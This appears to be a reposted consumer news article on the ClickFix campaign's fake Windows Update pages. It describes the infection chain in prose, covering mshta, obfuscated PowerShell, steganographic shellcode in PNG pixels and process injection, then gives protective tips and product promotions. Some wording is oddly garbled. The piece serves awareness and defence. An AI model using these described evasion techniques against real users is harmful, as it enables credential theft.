ClickFix campaign now uses fake Windows updates to spread malware

by
ClickFix campaign now uses fake Windows updates to spread malware

NEWNow you can listen to Fox News articles!

Cybercriminals continue to get better at infiltrating the software you use every day.

Over the past few years, we've seen phishing pages that replicate banking portals, fake browser alerts that claim your device is infected, and “human verification” screens that trick you into performing commands you should never touch. The final turn comes from current ClickFix campaign.

Instead of asking you to prove that you are a human, attackers now masquerade as Windows Update. It looks convincing enough that you can follow the instructions without thinking, which is exactly what they want.

Subscribe to my FREE CyberGuy Report
Get my best tech tips, breaking security alerts, and exclusive offers straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

NEW SCAM SENDS FAKE MICROSOFT 365 LOGIN PAGES

Malware lurks inside seemingly ordinary image files, using steganography to bypass traditional security tools. (Microsoft)

How a fake update works

Researchers have noticed that ClickFix has updated its old trick. Previously, the campaign relied on people's verification pages, but now you get a full-screen Windows update screen that looks almost identical to the real thing. Joe Security showed how the page displays fake progress bars, familiar update messages, and a prompt to perform a critical security update.

If you're using Windows, the site will prompt you to open a Run window, copy something from your clipboard, and paste it. That “something” is a command that automatically downloads a malware dropper program. The final payload is usually an information program that steals passwords, cookies, and other data from your computer.

NEW EMAIL SCAM USES HIDDEN SYMBOLS TO PASS FILTERS

Fake Windows update screen

Fake update screens are becoming increasingly difficult to detect as attackers imitate Windows with near-perfect accuracy. (Joe Security)

The moment you insert the command, the chain of infection begins. First, a z file named mshta.exe contacts the remote server and captures the script. To avoid detection, these URLs often hex encode parts of the address and change their paths. The script then runs convoluted PowerShell code filled with unnecessary instructions to discourage researchers. Once it's done its job, PowerShell decrypts the hidden .NET assembly that acts as a loader.

Why is this attack so difficult to detect?

The downloader hides the next step inside a regular PNG file. ClickFix uses special steganography, a technique that allows you to hide sensitive data inside normal-looking content. In this case, the malware resides within the pixel data of the image. Attackers tweak color values ​​in certain pixels, especially the red channel, to embed snippets of shellcode. When viewing the image everything looks fine.

The script knows exactly where the hidden data is. It extracts pixel values, decrypts them, and repairs the malware directly in memory. This means that nothing obvious is written to the disk. Security tools that use file scanning miss this because the shellcode is never shown as a separate file.

After the rebuild, the shellcode is injected into a trusted Windows process, such as explorer.exe. The attack uses familiar memory techniques such as VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Recent ClickFix Activities installed infostealers such as LummaC2 and updated versions of Rhadamanthys. These tools are designed to collect credentials and send them to the attacker with minimal noise.

A man in a sweatshirt works on several computer screens displaying digital data in a dark room.

Once the hidden code is loaded into a trusted Windows process, the data stealers quietly begin to collect your data. (Kurt “CyberGuy” Knutsson)

7 Steps You Can Take to Protect Yourself from the ClickFix Campaign

The best way to stay protected is to slow down for a moment and take a few steps that will prevent these attacks before they start.

1) Never run commands you didn't ask for

If any site prompts you to paste a command into Run, PowerShell, or Terminal, take it as an immediate warning sign. Real operating system updates never require you to run commands from a web page. By executing this command, you give full control to the attacker. If something doesn't seem right, close the page and don't interact again.

2) Store Windows updates inside Windows.

Updates should only come from the Windows Settings app or through official system notifications. A browser tab or pop-up window pretending to be a Windows update is always a fake. If you see anything outside of the normal update stream that requires your action, ignore it and check the actual Windows Update page yourself.

3) Use a reliable antivirus.

Select security package which can detect threats both at the file level and in memory. Stealth attacks like ClickFix leave no obvious files for scanners to scan. Tools with behavioral detection, sandboxing, and script monitoring give you a much better chance of catching unusual activity early on.

The best way to protect yourself from malicious links that install malware and potentially access your personal information is to install powerful antivirus software on all your devices. This protection can also alert you to phishing emails and ransomware, keeping your personal information and digital assets safe.

Get my picks for 2025's top antivirus protection winners for your Windows, Mac, Android, and iOS devices at Cyberguy.com.

4) Use a password manager

Password managers create strong and unique passwords for every account you use. They also autofill only on legitimate websites, which helps you detect fake login pages. If the manager refuses to enter your credentials, look at the URL again before entering anything manually.

Next, check if you have email has been compromised in past violations. Our #1 best password manager includes a built-in breach scanner that checks to see if your email address or passwords have appeared in known breaches. If you find a match, immediately change any reused passwords and secure those accounts with new, unique credentials.

Check out the best password managers of 2025, reviewed by experts, at Cyberguy.com.

5) Use the personal data deletion service

Many attacks begin by attacking emails and personal data already published on the Internet. Data removal services help reduce your digital footprint by requesting removal from data broker sites that collect and sell your information. They can't erase everything, but reducing your vulnerability means fewer attackers will have easy access to your data.

While no service can guarantee complete removal of your data from the internet, a data removal service is indeed a smart choice. They don't come cheap, and neither does your privacy. These services do all the work for you, actively monitoring and systematically removing your personal information from hundreds of websites. This is what gives me peace of mind and has proven to be the most effective way to erase your personal data from the internet. By limiting the information available, you reduce the risk that scammers will link leaked data to information they can find on the dark web, making it harder for them to target you.

Check out my top picks for data deletion services and get a free scan to see if your personal information is already posted online by visiting Cyberguy.com.

Get a free scan to see if your personal information has already been published online: Cyberguy.com.

6) Check URLs before trusting anything

A convincing layout does not mean it is legal. Always look at the domain name first. If it doesn't match the official site or uses strange spelling or extra characters, close it. Attackers rely on people recognizing the page design but ignoring the address bar.

7) Close suspicious full-screen pages.

Fake update pages often run in full screen mode to hide the browser interface and make the page appear to be part of your computer. If the site suddenly goes into full screen mode without your permission, exit using Esc or Alt+Tab. Once you exit, scan your system and do not return to this page.

Kurt's Key Takeaway

ClickFix works because it relies on user interaction. Nothing will happen unless you follow the on-screen instructions. This makes the fake Windows update page especially dangerous because it uses something that most people trust. If you're used to Windows updates freezing on your screen, you may not question the prompt that appears during the process. Cybercriminals know this. They copy trusted interfaces to lower your guard, and then rely on you to execute the last command. The techniques that follow are complex, but the starting point is simple. They need your help.

Have you ever copied commands from a website without thinking twice about what they do? Let us know by writing to us at Cyberguy.com.

CLICK HERE TO DOWNLOAD THE FOX NEWS APP

Subscribe to my FREE CyberGuy Report

Get my best tech tips, breaking security alerts, and exclusive offers straight to your inbox. Plus, you'll get instant access to my Ultimate Scam Survival Guide – free when you join my CYBERGUY.COM newsletter.

Copyright CyberGuy.com 2025. All rights reserved.

Kurt “CyberGuy” Knutsson is an award-winning tech journalist with a deep love of technology, gear and gadgets that make lives better through his reporting for Fox News and FOX Business, starting with the morning programs “FOX & Friends.” Have a technical question? Get Kurt's free CyberGuy newsletter, share your voice, story idea, or leave a comment on CyberGuy.com.

Leave a Comment

About Us

Orva Insight provides global news on crypto, online money-making, sports (cricket, football, soccer, baseball), live streaming, and premium courses. Stay updated with breaking news, analysis, and insights.

Follow US

PH +1 206 531 3331

24 M Drive
East Hampton, NY 11937

© 2025 INFO

PRIVACY POLICY terms of service